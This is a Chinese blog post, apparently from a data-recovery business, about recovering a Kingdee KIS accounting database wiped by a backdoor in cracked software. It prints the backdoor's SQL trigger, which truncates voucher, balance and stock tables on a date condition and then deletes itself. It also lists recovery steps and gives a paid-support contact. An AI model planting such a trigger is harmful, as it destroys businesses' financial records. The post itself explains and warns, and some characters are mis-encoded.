金蝶KIS專業(yè)版替換allinone和sxs.dll補(bǔ)?。ㄔ夂箝T清空或破壞數(shù)據(jù)被修改為“恢復(fù)數(shù)據(jù)請聯(lián)系”）

【數(shù)據(jù)恢復(fù)過程】

接到電話后，客戶發(fā)來遭后門修改數(shù)據(jù)庫文件，立即組織對數(shù)據(jù)庫分析工作，發(fā)現(xiàn)數(shù)據(jù)庫內(nèi)有一個后門觸發(fā)器?t_log_autoNumbe ，大致代碼內(nèi)容為：

if (@FGLCurrYear=2014 and @FGLCurrPeriod>=1) or (@FICCurrYear=2014 and @FICCurrPeriod>=1)

begin
if (@Flogdays>=15)
begin
TRUNCATE TABLE t_voucherEntry ?--刪除總賬憑證
TRUNCATE TABLE t_balance --刪除科目余額表
if @FVersion=‘8.0‘ ?--版本大于8.0
TRUNCATE TABLE icstockbillEntry --刪除存貨出入庫明細(xì)賬
else
TRUNCATE TABLE t_cc_stockbillEntry --刪除出入庫存貨明細(xì)賬
drop trigger t_log_AutoNumber
end
end

GO

1．對故障盤進(jìn)行全盤鏡像，對mdf文件進(jìn)行備份，防止二次造成破壞。

2．對鏡像盤進(jìn)行掃描重組，對刪除的表進(jìn)行字段分析。

3．對mdf進(jìn)行底層數(shù)據(jù)分析，與表結(jié)構(gòu)進(jìn)行匹配。

4．通過程序的匹配，找到所有刪除表的原始ID。

5．通過ID和新表結(jié)構(gòu)，對數(shù)據(jù)進(jìn)行提取，生成SQL 腳本。

6．把SQL腳本附加到新的數(shù)據(jù)庫中。

7．把未刪除的表的數(shù)據(jù)進(jìn)行遷移。

【恢復(fù)結(jié)果】：發(fā)回給客戶測試驗收，反饋數(shù)據(jù)基本正確，能恢復(fù)這個程度，也實屬困難，客戶很滿意！得到客戶的極大好評。

【溫馨提示】：使用網(wǎng)上隨便下載的破解版軟件，危害很大；居心不良的破解者，可能會留下后門木馬，刪除修改數(shù)據(jù)，敲詐錢財。如果商用，請使用正版軟件；如經(jīng)濟(jì)實力不允許，也不要到處下載軟件所使用；

PS：好好的軟件，為啥免費？還不是為了后期讓你繳費，說白了就是讓你支付更多的錢財；1、正版 2、找有技術(shù)或者技術(shù)支持的；

問題未解決？付費解決問題加Q或微信 2589053300 (即Q號又微信號)右上方掃一掃可加博主微信

所寫所說，是心之所感，思之所悟，行之所得；文當(dāng)無敷衍，落筆求簡潔。 以所舍，求所獲；有所依，方所成！